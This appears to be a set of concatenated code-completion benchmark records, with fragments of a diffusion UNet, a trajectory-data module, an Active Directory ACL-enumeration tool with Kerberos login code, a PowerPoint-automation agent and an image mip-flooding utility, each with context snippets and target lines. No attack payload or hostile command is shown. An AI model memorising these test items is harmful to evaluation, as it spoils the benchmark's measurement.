x, (x.shape[2], x.shape[3] * 2, x.shape[4] * 2), mode="nearest"
)
else:
x = F.interpolate(x, scale_factor=2, mode="nearest")
# if self.scale_guide:
# x = F.interpolate(x, scale_factor=1.75, mode="nearest")
# else:
# x = F.interpolate(x, scale_factor=2, mode="nearest")
if self.use_conv:
x = self.conv(x)
return x
class TransposedUpsample(nn.Module):
'Learned 2x upsampling without padding'
def __init__(self, channels, out_channels=None, ks=5):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.up = nn.ConvTranspose2d(self.channels,self.out_channels,kernel_size=ks,stride=2)
def forward(self,x):
return self.up(x)
class Downsample(nn.Module):
"""
A downsampling layer with an optional convolution.
:param channels: channels in the inputs and outputs.
:param use_conv: a bool determining if a convolution is applied.
:param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
downsampling occurs in the inner-two dimensions.
"""
def __init__(self, channels, use_conv, dims=2, out_channels=None,padding=1):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.dims = dims
stride = 2 if dims != 3 else (1, 2, 2)
if use_conv:
self.op = conv_nd(
dims, self.channels, self.out_channels, 3, stride=stride, padding=padding
)
else:
assert self.channels == self.out_channels
self.op = avg_pool_nd(dims, kernel_size=stride, stride=stride)
def forward(self, x):
assert x.shape[1] == self.channels
return self.op(x)
class ResBlock(TimestepBlock):
"""
A residual block that can optionally change the number of channels.
:param channels: the number of input channels.
:param emb_channels: the number of timestep embedding channels.
:param dropout: the rate of dropout.
:param out_channels: if specified, the number of out channels.
:param use_conv: if True and out_channels is specified, use a spatial
convolution instead of a smaller 1x1 convolution to change the
channels in the skip connection.
:param dims: determines if the signal is 1D, 2D, or 3D.
:param use_checkpoint: if True, use gradient checkpointing on this module.
:param up: if True, use this block for upsampling.
:param down: if True, use this block for downsampling.
"""
def __init__(
self,
channels,
emb_channels,
dropout,
out_channels=None,
use_conv=False,
use_scale_shift_norm=False,
dims=2,
use_checkpoint=False,
up=False,
down=False,
):
super().__init__()
self.channels = channels
self.emb_channels = emb_channels
self.dropout = dropout
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.use_checkpoint = use_checkpoint
self.use_scale_shift_norm = use_scale_shift_norm
self.in_layers = nn.Sequential(
normalization(channels),
nn.SiLU(),
conv_nd(dims, channels, self.out_channels, 3, padding=1),
)
self.updown = up or down
if up:
self.h_upd = Upsample(channels, False, dims)
self.x_upd = Upsample(channels, False, dims)
elif down:
self.h_upd = Downsample(channels, False, dims)
self.x_upd = Downsample(channels, False, dims)
else:
self.h_upd = self.x_upd = nn.Identity()
self.emb_layers = nn.Sequential(
nn.SiLU(),
linear(
emb_channels,
2 * self.out_channels if use_scale_shift_norm else self.out_channels,
),
)
self.out_layers = nn.Sequential(
normalization(self.out_channels),
nn.SiLU(),
nn.Dropout(p=dropout), | zero_module( | 4 | 2023-10-30 14:21:09+00:00 | 4k |
nv-tlabs/trace | tbsim/datasets/factory.py | [
{
"identifier": "translate_pass_trajdata_cfg",
"path": "tbsim/utils/config_utils.py",
"snippet": "def translate_pass_trajdata_cfg(cfg: ExperimentConfig):\n \"\"\"\n Translate a unified passthrough config to trajdata.\n \"\"\"\n rcfg = Dict()\n rcfg.step_time = cfg.algo.step_time\n rcfg.trajdata_cache_location = cfg.train.trajdata_cache_location\n rcfg.trajdata_source_train = cfg.train.trajdata_source_train\n rcfg.trajdata_source_valid = cfg.train.trajdata_source_valid\n rcfg.trajdata_data_dirs = cfg.train.trajdata_data_dirs\n rcfg.trajdata_rebuild_cache = cfg.train.trajdata_rebuild_cache\n\n rcfg.history_num_frames = cfg.algo.history_num_frames\n rcfg.future_num_frames = cfg.algo.future_num_frames\n\n rcfg.trajdata_centric = cfg.env.data_generation_params.trajdata_centric\n rcfg.trajdata_only_types = cfg.env.data_generation_params.trajdata_only_types\n rcfg.trajdata_predict_types = cfg.env.data_generation_params.trajdata_predict_types\n rcfg.trajdata_incl_map = cfg.env.data_generation_params.trajdata_incl_map\n rcfg.max_agents_distance = cfg.env.data_generation_params.trajdata_max_agents_distance\n rcfg.trajdata_standardize_data = cfg.env.data_generation_params.trajdata_standardize_data\n rcfg.trajdata_scene_desc_contains = cfg.env.data_generation_params.trajdata_scene_desc_contains\n\n rcfg.pixel_size = cfg.env.rasterizer.pixel_size\n rcfg.raster_size = int(cfg.env.rasterizer.raster_size)\n rcfg.raster_center = cfg.env.rasterizer.ego_center\n rcfg.num_sem_layers = cfg.env.rasterizer.num_sem_layers\n rcfg.drivable_layers = cfg.env.rasterizer.drivable_layers\n rcfg.no_map_fill_value = cfg.env.rasterizer.no_map_fill_value\n rcfg.raster_include_hist = cfg.env.rasterizer.include_hist\n\n rcfg.lock()\n return rcfg"
},
{
"identifier": "PassUnifiedDataModule",
"path": "tbsim/datasets/trajdata_datamodules.py",
"snippet": "class PassUnifiedDataModule(pl.LightningDataModule):\n \"\"\"\n Pass-through config options to unified data loader.\n This is a more general version of the above UnifiedDataModule which \n only supports any dataset available through trajdata.\n \"\"\"\n def __init__(self, data_config, train_config: TrainConfig):\n super(PassUnifiedDataModule, self).__init__()\n self._data_config = data_config\n self._train_config = train_config\n self.train_dataset = None\n self.valid_dataset = None\n self.num_sem_layers = None\n\n @property\n def modality_shapes(self):\n \"\"\"\n Returns the expected shape of combined rasterized layers\n (semantic + traj history + current)\n \"\"\"\n # num_history + current\n hist_layer_size = self._data_config.history_num_frames + 1 if self._data_config.raster_include_hist \\\n else 0\n return dict(\n image=(self.num_sem_layers + hist_layer_size, # semantic map\n self._data_config.raster_size,\n self._data_config.raster_size)\n )\n\n def setup(self, stage=None):\n data_cfg = self._data_config\n future_sec = data_cfg.future_num_frames * data_cfg.step_time\n history_sec = data_cfg.history_num_frames * data_cfg.step_time\n neighbor_distance = data_cfg.max_agents_distance\n agent_only_types = [TRAJDATA_AGENT_TYPE_MAP[cur_type] for cur_type in data_cfg.trajdata_only_types]\n agent_predict_types = None\n if data_cfg.trajdata_predict_types is not None:\n agent_predict_types = [TRAJDATA_AGENT_TYPE_MAP[cur_type] for cur_type in data_cfg.trajdata_predict_types]\n\n kwargs = dict(\n cache_location=data_cfg.trajdata_cache_location,\n desired_data=data_cfg.trajdata_source_train,\n desired_dt=data_cfg.step_time,\n future_sec=(future_sec, future_sec),\n history_sec=(history_sec, history_sec),\n data_dirs=data_cfg.trajdata_data_dirs,\n only_types=agent_only_types,\n only_predict=agent_predict_types,\n agent_interaction_distances=defaultdict(lambda: neighbor_distance),\n incl_map=data_cfg.trajdata_incl_map,\n map_params={\n \"px_per_m\": int(1 / data_cfg.pixel_size),\n \"map_size_px\": data_cfg.raster_size,\n \"return_rgb\": False,\n \"offset_frac_xy\": data_cfg.raster_center,\n \"no_map_fill_value\": data_cfg.no_map_fill_value,\n },\n centric=data_cfg.trajdata_centric,\n scene_description_contains=data_cfg.trajdata_scene_desc_contains,\n standardize_data=data_cfg.trajdata_standardize_data,\n verbose=True,\n num_workers=os.cpu_count(),\n rebuild_cache=data_cfg.trajdata_rebuild_cache,\n rebuild_maps=data_cfg.trajdata_rebuild_cache,\n )\n print(kwargs)\n self.train_dataset = UnifiedDataset(**kwargs)\n\n kwargs[\"desired_data\"] = data_cfg.trajdata_source_valid\n self.valid_dataset = UnifiedDataset(**kwargs)\n\n # set modality shape based on input\n self.num_sem_layers = 0 if not data_cfg.trajdata_incl_map else data_cfg.num_sem_layers\n\n gc.collect()\n\n def train_dataloader(self):\n return DataLoader(\n dataset=self.train_dataset,\n shuffle=True,\n batch_size=self._train_config.training.batch_size,\n num_workers=self._train_config.training.num_data_workers,\n drop_last=True,\n collate_fn=self.train_dataset.get_collate_fn(return_dict=True),\n persistent_workers=False\n )\n\n def val_dataloader(self):\n return DataLoader(\n dataset=self.valid_dataset,\n shuffle=True, # since pytorch lightning only evals a subset of val on each epoch, shuffle\n batch_size=self._train_config.validation.batch_size,\n num_workers=self._train_config.validation.num_data_workers,\n drop_last=True,\n collate_fn=self.valid_dataset.get_collate_fn(return_dict=True),\n persistent_workers=False\n )\n\n def 
test_dataloader(self):\n pass\n\n def predict_dataloader(self):\n pass"
}
] | from tbsim.utils.config_utils import translate_pass_trajdata_cfg
from tbsim.datasets.trajdata_datamodules import PassUnifiedDataModule | 1,604 |
| """DataModule / Dataset factory"""
def datamodule_factory(cls_name: str, config):
"""
A factory for creating pl.DataModule.
Args:
cls_name (str): name of the datamodule class
config (Config): an Experiment config object
**kwargs: any other kwargs needed by the datamodule
Returns:
A DataModule
"""
if cls_name.startswith("PassUnified"): | trajdata_config = translate_pass_trajdata_cfg(config) | 0 | 2023-10-31 18:43:07+00:00 | 4k |
AetherBlack/abuseACL | abuseACL/network/LDAP.py | [
{
"identifier": "sAMAccountType",
"path": "abuseACL/structures/sAMAccountType.py",
"snippet": "class sAMAccountType:\n\n SAM_DOMAIN_OBJECT = 0x0\n SAM_GROUP_OBJECT = 0x10000000\n SAM_NON_SECURITY_GROUP_OBJECT = 0x10000001\n SAM_ALIAS_OBJECT = 0x20000000\n SAM_NON_SECURITY_ALIAS_OBJECT = 0x20000001\n SAM_USER_OBJECT = 0x30000000\n SAM_NORMAL_USER_ACCOUNT = 0x30000000\n SAM_MACHINE_ACCOUNT = 0x30000001\n SAM_TRUST_ACCOUNT = 0x30000002\n SAM_APP_BASIC_GROUP = 0x40000000\n SAM_APP_QUERY_GROUP = 0x40000001\n SAM_ACCOUNT_TYPE_MAX = 0x7fffffff"
},
{
"identifier": "Credentials",
"path": "abuseACL/structures/Credentials.py",
"snippet": "class Credentials:\n\n def __init__(self, username: str, password: str, domain: str, ntlmhash: str, aesKey: str, doKerberos: bool) -> None:\n self.username = username\n self.password = password\n self.domain = domain\n self.ntlmhash = ntlmhash\n self.aesKey = aesKey\n self.doKerberos = doKerberos\n\n def getAuthenticationSecret(self) -> str:\n return self.password or self.ntlmhash"
},
{
"identifier": "Target",
"path": "abuseACL/structures/Target.py",
"snippet": "class Target:\n\n tlsv1_2: bool = None\n tlsv1: bool = None\n\n def __init__(self, remote: str, port: int) -> None:\n self.remote = remote\n self.port = port\n\n def use_tls(self) -> bool:\n return self.tlsv1_2 or self.tlsv1"
},
{
"identifier": "ADCertificateTemplate",
"path": "abuseACL/structures/ADObject/ADCertificateTemplate.py",
"snippet": "class ADCertificateTemplate(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.name\n self.objectSid = str()"
},
{
"identifier": "ADAdminSDHolder",
"path": "abuseACL/structures/ADObject/ADAdminSDHolder.py",
"snippet": "class ADAdminSDHolder(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.name\n self.objectSid = str()"
},
{
"identifier": "ADComputer",
"path": "abuseACL/structures/ADObject/ADComputer.py",
"snippet": "class ADComputer(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, sAMAccountName: str, objectSid: str, nTSecurityDescriptor: bytes, userAccountControl: int) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.sAMAccountName = sAMAccountName[0].decode().lower()\n self.objectSid = self.convertSid(objectSid[0])\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n self.userAccountControl = int(userAccountControl[0].decode())\n\n self.isUserEnable = self.userAccountControl & 0x0002\n\n @staticmethod\n def getComputerSid(computers: list, computername: str) -> str:\n for computer in computers:\n computer: ADComputer\n\n if computer.sAMAccountName == computername:\n return computer.objectSid\n\n return None"
},
{
"identifier": "ADSchema",
"path": "abuseACL/structures/ADObject/ADSchema.py",
"snippet": "class ADSchema(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.name\n self.objectSid = str()"
},
{
"identifier": "ADGroup",
"path": "abuseACL/structures/ADObject/ADGroup.py",
"snippet": "class ADGroup(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, sAMAccountName: str, objectSid: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.sAMAccountName = sAMAccountName[0].decode().lower()\n self.objectSid = self.convertSid(objectSid[0])\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n @staticmethod\n def getGroupSid(groups: list, groupname: str) -> str:\n for group in groups:\n group: ADGroup\n\n if group.sAMAccountName == groupname:\n return group.objectSid\n\n return None"
},
{
"identifier": "ADUser",
"path": "abuseACL/structures/ADObject/ADUser.py",
"snippet": "class ADUser(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, userPrincipalName: str, sAMAccountName: str, objectSid: str, nTSecurityDescriptor: bytes, userAccountControl: int) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.userPrincipalName = userPrincipalName[0].decode() if len(userPrincipalName) else userPrincipalName\n self.sAMAccountName = sAMAccountName[0].decode().lower()\n self.objectSid = self.convertSid(objectSid[0])\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n self.userAccountControl = int(userAccountControl[0].decode())\n\n self.isUserEnable = self.userAccountControl & 0x0002\n\n @staticmethod\n def getUserSid(users: list, username: str) -> str:\n for user in users:\n user: ADUser\n\n if user.sAMAccountName == username:\n return user.objectSid\n\n return None"
},
{
"identifier": "ADgMSA",
"path": "abuseACL/structures/ADObject/ADgMSA.py",
"snippet": "class ADgMSA(ADObject):\n\n def __init__(self, distinguishedName: str, sAMAccountName: str, objectSid: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.sAMAccountName = sAMAccountName[0].decode().lower()\n self.objectSid = self.convertSid(objectSid[0])\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n @staticmethod\n def getgMSASid(gMSAs: list, principal: str) -> str:\n for gMSA in gMSAs:\n gMSA: ADgMSA\n\n print(gMSA.sAMAccountName, principal)\n\n if gMSA.sAMAccountName == principal:\n return gMSA.objectSid\n\n return None"
},
{
"identifier": "ADGPO",
"path": "abuseACL/structures/ADObject/ADGPO.py",
"snippet": "class ADGPO(ADObject):\n\n def __init__(self, distinguishedName: str, displayName: str, gPCFileSysPath: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.displayName = displayName[0].decode()\n self.gPCFileSysPath = gPCFileSysPath[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.displayName\n self.objectSid = str()"
},
{
"identifier": "ADOU",
"path": "abuseACL/structures/ADObject/ADOU.py",
"snippet": "class ADOU(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.name\n self.objectSid = str()"
},
{
"identifier": "Kerberos",
"path": "abuseACL/network/Kerberos.py",
"snippet": "class Kerberos:\n\n @staticmethod\n def kerberosLogin(target: str, user: str, password: str, domain: str = \"\", hashes: str = \"\", aesKey: str = \"\",\n kdcHost: str = None, TGT=None, TGS=None, useCache: bool = False):\n\n if len(hashes):\n lmhash, nthash = hashes.split(\":\")\n\n if len(lmhash) % 2:\n lmhash = \"0\" + lmhash\n if len(nthash) % 2:\n nthash = \"0\" + nthash\n\n lmhash = bytes.fromhex(lmhash)\n nthash = bytes.fromhex(nthash)\n else:\n lmhash, nthash = \"\", \"\"\n\n if TGT is None or TGS is None:\n useCache = True\n\n targetName = \"ldap/%s\" % target\n if useCache:\n domain, user, TGT, TGS = CCache.parseFile(domain, user, targetName)\n\n # First of all, we need to get a TGT for the user\n userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n if TGT is None and TGS is None:\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash,\n aesKey, kdcHost)\n else:\n tgt = TGT['KDC_REP']\n cipher = TGT['cipher']\n sessionKey = TGT['sessionKey']\n\n if TGS is None:\n serverName = Principal(targetName, type=constants.PrincipalNameType.NT_SRV_INST.value)\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher,\n sessionKey)\n else:\n tgs = TGS['KDC_REP']\n cipher = TGS['cipher']\n sessionKey = TGS['sessionKey']\n\n # Let's build a NegTokenInit with a Kerberos REQ_AP\n\n blob = SPNEGO_NegTokenInit()\n\n # Kerberos\n blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]\n\n # Let's extract the ticket from the TGS\n tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]\n ticket = Ticket()\n ticket.from_asn1(tgs['ticket'])\n\n # Now let's build the AP_REQ\n apReq = AP_REQ()\n apReq['pvno'] = 5\n apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)\n\n opts = []\n apReq['ap-options'] = constants.encodeFlags(opts)\n seq_set(apReq, 'ticket', ticket.to_asn1)\n\n authenticator = Authenticator()\n authenticator['authenticator-vno'] = 5\n authenticator['crealm'] = domain\n seq_set(authenticator, 'cname', userName.components_to_asn1)\n now = datetime.datetime.utcnow()\n\n authenticator['cusec'] = now.microsecond\n authenticator['ctime'] = KerberosTime.to_asn1(now)\n\n encodedAuthenticator = encoder.encode(authenticator)\n\n # Key Usage 11\n # AP-REQ Authenticator (includes application authenticator\n # subkey), encrypted with the application session key\n # (Section 5.5.1)\n encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)\n\n apReq['authenticator'] = noValue\n apReq['authenticator']['etype'] = cipher.enctype\n apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator\n\n blob['MechToken'] = encoder.encode(apReq)\n\n return blob"
},
{
"identifier": "Logger",
"path": "abuseACL/core/Logger.py",
"snippet": "class Logger:\n\n def __init__(self, debug: bool, timestamp: bool) -> None:\n self.__debug = debug\n self.__timestamp = timestamp\n\n def __toStdout(self, color: str, title: str, msg: str) -> None:\n timestamp = str()\n\n if self.__timestamp:\n timestamp = time.strftime(\"[%Y/%m/%d %H:%M:%S] \")\n\n print(\"%s%s[%s] %s%s\" % (color, timestamp, title, msg, Style.RESET_ALL))\n\n def debug(self, msg: str) -> None:\n if self.__debug:\n self.__toStdout(Fore.BLUE, \"i\", msg)\n\n def error(self, msg: str) -> None:\n self.__toStdout(Fore.RED, \"!\", msg)\n\n def vuln(self, msg: str) -> None:\n self.__toStdout(Fore.GREEN, \"*\", msg)"
}
] | from typing import List
from abuseACL.structures.sAMAccountType import sAMAccountType
from abuseACL.structures.Credentials import Credentials
from abuseACL.structures.Target import Target
from abuseACL.structures.ADObject.ADCertificateTemplate import ADCertificateTemplate
from abuseACL.structures.ADObject.ADAdminSDHolder import ADAdminSDHolder
from abuseACL.structures.ADObject.ADComputer import ADComputer
from abuseACL.structures.ADObject.ADSchema import ADSchema
from abuseACL.structures.ADObject.ADGroup import ADGroup
from abuseACL.structures.ADObject.ADUser import ADUser
from abuseACL.structures.ADObject.ADgMSA import ADgMSA
from abuseACL.structures.ADObject.ADGPO import ADGPO
from abuseACL.structures.ADObject.ADOU import ADOU
from abuseACL.network.Kerberos import Kerberos
from abuseACL.core.Logger import Logger
import ssl as tls
import ldap3 | 3,501 |
class LDAP:
users = list()
groups = list()
computers = list()
certificatesTemplates = list()
gpos = list()
ous = list()
adminSDHolder = list()
schema = list()
gMSA = list()
| def __init__(self, forest: str, target: Target, credentials: Credentials, logger: Logger) -> None: | 13 | 2023-10-30 21:19:24+00:00 | 4k |
gydpku/PPTC | src/modeling.py | [
{
"identifier": "ppt_executor",
"path": "src/ppt_executor.py",
"snippet": "SLIDE_HEIGHT = 6858000\nSLIDE_WIDTH = 9144000\nCENTER_TOP = 3429000\nCENTER_LEFT = 4572000\nSHAPE_HEIGHT = 900000\nSHAPE_WIDTH = 900000\nTABLE_HEIGHT = 370000 # per line\nCONTENT_HEIGHT = 4351338\nCONTENT_WIDTH = 7886700\nCONTENT_LEFT = 628650\nCONTENT_TOP = 1825625\nTITLE_HEIGHT = 1325563\nTITLE_WIDTH = 7886700\nTITLE_LEFT = 628650\nTITLE_TOP = 365126\nMARGIN = 600000\nCORNER_LEFT = 0 + MARGIN\nCORNER_TOP = 0 + MARGIN\nCORNER_RIGHT = SLIDE_WIDTH - MARGIN\nCORNER_BOTTOM = SLIDE_HEIGHT - MARGIN\nSHAPE_LEFT = CENTER_LEFT - SHAPE_WIDTH / 2\nSHAPE_TOP = CENTER_TOP - SHAPE_HEIGHT / 2\nPIC_LEFT = CONTENT_LEFT\nPIC_TOP = CONTENT_TOP \nPIC_PATH = \"./PPTC/\"+\"test/pics\"\ndef check_api_in_list(line, api_list):\ndef API_executor(lines, test=False,args=None):\ndef set_ppt(ppt_path):\ndef set_current_slide(idx):\ndef get_ppt():\ndef save_ppt(ppt_path):\ndef get_current_page_id():\ndef create_slide():\ndef move_to_next_slide():\ndef move_to_previous_slide():\ndef move_to_slide(idx):\ndef set_background_color(color):\ndef choose_title():\ndef choose_content():\ndef choose_textbox(idx=0):\ndef choose_picture(idx=0):\ndef choose_chart():\ndef choose_shape(shape_name):\ndef choose_table():\ndef choose_table_cell(row_id, column_id):\ndef insert_text(text):\ndef insert_bullet_point(text):\ndef insert_note(note):\ndef insert_textbox():\ndef delete_text():\ndef set_font_size(size):\ndef set_font_color(color):\ndef set_font_bold():\ndef set_font_italic():\ndef set_font_underline():\ndef set_font_style(font_name):\ndef set_line_space(line_space_level=0):\ndef text_align_left():\ndef text_align_center():\ndef text_align_right():\ndef insert_rectangle():\ndef insert_right_arrow():\ndef insert_rounded_rectangle():\ndef insert_triangle():\ndef insert_callout():\ndef insert_cloud():\ndef insert_star():\ndef insert_circle():\ndef insert_picture(picture_name):\ndef set_width(width):\ndef set_height(height):\ndef rotate_element(angle):\ndef set_fill_color(color):\ndef align_top_right_corner():\ndef align_top_left_corner():\ndef align_bottom_right_corner():\ndef align_bottom_left_corner():\ndef align_slide_left():\ndef align_slide_right():\ndef align_slide_top():\ndef align_slide_bottom():\ndef align_slide_center():\ndef set_left(left):\ndef set_top(top):\ndef insert_table(row_num, col_num):\ndef insert_table_row(row_data):\ndef insert_line_chart(data,series=None):\ndef insert_bar_chart(data,series=None):\ndef insert_pie_chart(data,series=None):\ndef set_chart_title(title):"
},
{
"identifier": "ppt_reader",
"path": "src/ppt_reader.py",
"snippet": "SCALE = 1000\ndef get_fill_color(shape):\n def __init__(self, shape):\n def text_info(self):\n def space_info(self):\n def size_info(self):\n def style_info(self):\n def discription(self):\n def __repr__(self):\n def __init__(self, shape, id=None):\n def style_info(self):\n def discription(self):\n def __init__(self, shape):\n def text_info(self):\n def discription(self):\n def __init__(self, shape):\n def text_info(self):\n def style_info(self):\n def discription(self):\n def __init__(self, shape, id=None):\n def text_info(self):\n def style_info(self):\n def discription(self):\n def __init__(self, shape):\n def text_info(self):\n def style_info(self):\n def __init__(self, shape):\n def text_info(self):\n def style_info(self):\ndef hasshape(shape_str, shape_list):\ndef get_content(need_text,need_style,need_position,need_title,need_content,need_picture,need_table,need_chart,need_textbox,need_shape):\ndef get_content_by_instructions(ppt_path, instruction, args, ppt):\ndef eval_get_contents(need_text=True, need_style=True, need_position=True, need_shape_list=None, ppt=None):\nclass BasicShape:\nclass Picture(BasicShape):\nclass Table(BasicShape):\nclass Chart(BasicShape):\nclass Textbox(BasicShape):\nclass Placeholder(BasicShape):\nclass AutoShape(BasicShape):"
},
{
"identifier": "openai_api",
"path": "src/openai_api.py",
"snippet": "def completions_with_backoff(**kwargs):\ndef chat_with_backoff(**kwargs):\ndef embeddings_with_backoff(**kwargs):\ndef query_azure_openai(query, model = \"vicuna-13b-v1.5-16k\",id=None):\n def truncate_text_with_token_count (text, max_tokens):\ndef rewrite(prompt):"
},
{
"identifier": "prompt_factor",
"path": "src/prompt_factor.py",
"snippet": "def get_instruction_to_API_code_prompt(selected_API, ppt_content, chat_history, instruction, ask_less_question=False, current_page=1):\ndef get_instruction_to_API_code_prompt2(selected_API, ppt_content, chat_history, instruction, ask_less_question=False, current_page=1):"
},
{
"identifier": "dataset",
"path": "src/dataset.py",
"snippet": "def load_data(path, dataset, args):\ndef load_data_json(path, dataset):"
},
{
"identifier": "api_selection",
"path": "src/api_selection.py",
"snippet": "K = None\n K = args.api_topk\ndef get_topk(scores, k=10):\ndef get_embedding(text):\ndef get_api_embedding(args):\ndef select_api(query, k=10):\ndef get_selected_apis(instruction, args):\ndef get_all_apis(args):\ndef prepare_embedding(args):"
},
{
"identifier": "utils",
"path": "src/utils.py",
"snippet": "def write_list(lst, filename):\ndef read_list(filename):\ndef write_lines(lst, path):\ndef read_lines(path):\ndef makedir(path):\ndef merge_list(lst):\ndef get_picture_name(labels):\ndef get_picture_name_list(args):\ndef parse_api(codes):\ndef prepare_exp_name(args):\ndef get_tokens(text):\ndef calc_api_cost(path):\ndef check_token(model, prompt):\ndef get_token(text, trunc_num, model):\ndef checkpoint(mode,args,idx,step):\ndef sorted_list(path):\ndef parse_train_json(path):\ndef parse_test_json(path):"
},
{
"identifier": "api_doc",
"path": "src/api_doc.py",
"snippet": "class API(object):\n def __init__(self, name, parameters, description,\n parameter_description=\"\", composition_instruction=\"\", example=\"\", api_desc=\"\",\n type=\"\",\n implementation=None,\n ):\n def __str__(self):\ndef random_permutation(lst):\ndef get_all_APIs(args):\ndef get_API_name(apis):\ndef get_API_desc(apis):\ndef get_must_APIs(args):\ndef api_lack_mask(apis):"
}
] | from src import ppt_executor, ppt_reader, openai_api, prompt_factor, dataset, api_selection, utils, api_doc | 1,944 |
class PPT_assistant(object):
def __init__(self, args=None):
self.chat_history = []
self.args = args
self.planning = args.planning
self.api_selection = args.api_selection
self.content_selection = args.content_selection
self.model = args.model
self.model_id=args.model_id
self.ppt = None
self.current_page_id = 0
self.prompt = ""
def planner(self, instruction):
if not self.planning:
return [instruction]
else:
print('Planning...')
planning_prompt = prompt_factor.query_decomposition_prompt.format(instruction)
self.prompt += planning_prompt + "\n\n"
planning_reply = openai_api.query_azure_openai(planning_prompt, model=self.model).strip()
decomposed = planning_reply.split('\n')
decomposed = [d.replace('</d>','') for d in decomposed if (d != '</d>') and (d != '<d>')]
print(f"{instruction}->{decomposed}")
return decomposed
def api_selector(self, instruction):
if not self.api_selection:
all_apis = api_selection.get_all_apis(self.args)
return all_apis
else:
selected_apis = api_selection.get_selected_apis(instruction, self.args)
print('Selecting APIs...')
print([x.name for x in selected_apis])
return selected_apis
def content_selector(self, ppt_path, instruction, args, ppt): | content, prompt = ppt_reader.get_content_by_instructions(ppt_path, instruction, args, ppt) | 1 | 2023-10-25 13:14:46+00:00 | 4k |
secarri/MipFlooding | mipflooding/image_processing.py | [
{
"identifier": "setup_logger",
"path": "mipflooding/logger.py",
"snippet": "def setup_logger(logger_name: str, abs_log_path: str) -> logging.Logger:\n \"\"\"Set up a logger with the specified name and log to the given absolute path, returning the logger instance.\"\"\"\n logger = logging.getLogger(logger_name)\n if not logger.handlers:\n handler = logging.FileHandler(abs_log_path)\n formatter = logging.Formatter('[%(asctime)s] - %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n handler.setFormatter(formatter)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n return logger"
},
{
"identifier": "terminate_loggers",
"path": "mipflooding/logger.py",
"snippet": "def terminate_loggers(logger: logging.Logger) -> None:\n \"\"\"Terminate and close all handlers associated with the given logger, releasing any associated resources.\"\"\"\n handlers = logger.handlers[:]\n for handler in handlers:\n handler.close()\n logger.removeHandler(handler)"
},
{
"identifier": "clear_log_file",
"path": "mipflooding/file_utils.py",
"snippet": "def clear_log_file(filepath: Path) -> None:\n \"\"\"Clear the content of the log file at the specified 'filepath' if it exists.\"\"\"\n filepath.write_text(\"\", encoding=\"utf-8\")"
},
{
"identifier": "get_output_directory",
"path": "mipflooding/file_utils.py",
"snippet": "def get_output_directory(filepath: str) -> str | None:\n \"\"\"Get the parent directory of the specified 'filepath' as a string if it exists, or return None.\"\"\"\n parent_path = Path(filepath).parent\n return parent_path.__str__() if parent_path.exists() else None"
},
{
"identifier": "get_output_filename",
"path": "mipflooding/file_utils.py",
"snippet": "def get_output_filename(filepath: str) -> str | None:\n \"\"\"Get the filename from the specified 'filepath' as a string, or return None if the path is empty.\"\"\"\n return Path(filepath).name.__str__()"
}
] | import logging
import math
import os
import time
from pathlib import Path
from typing import List, Optional
from PIL import Image
from .logger import setup_logger, terminate_loggers
from .file_utils import clear_log_file, get_output_directory, get_output_filename | 1,829 |
# From self package
def _open_image_inputs(color: str, alpha: str, logger: logging.Logger) -> List:
"""Open and return the color and alpha images as a list of Image objects."""
logger.info("--- Opening images in memory...")
if not color:
color = str(None)
if not alpha:
alpha = str(None)
color_map = None if not Path(color).exists() else Image.open(color)
alpha_mask = None if not Path(alpha).exists() else Image.open(alpha).convert('L')
if color_map:
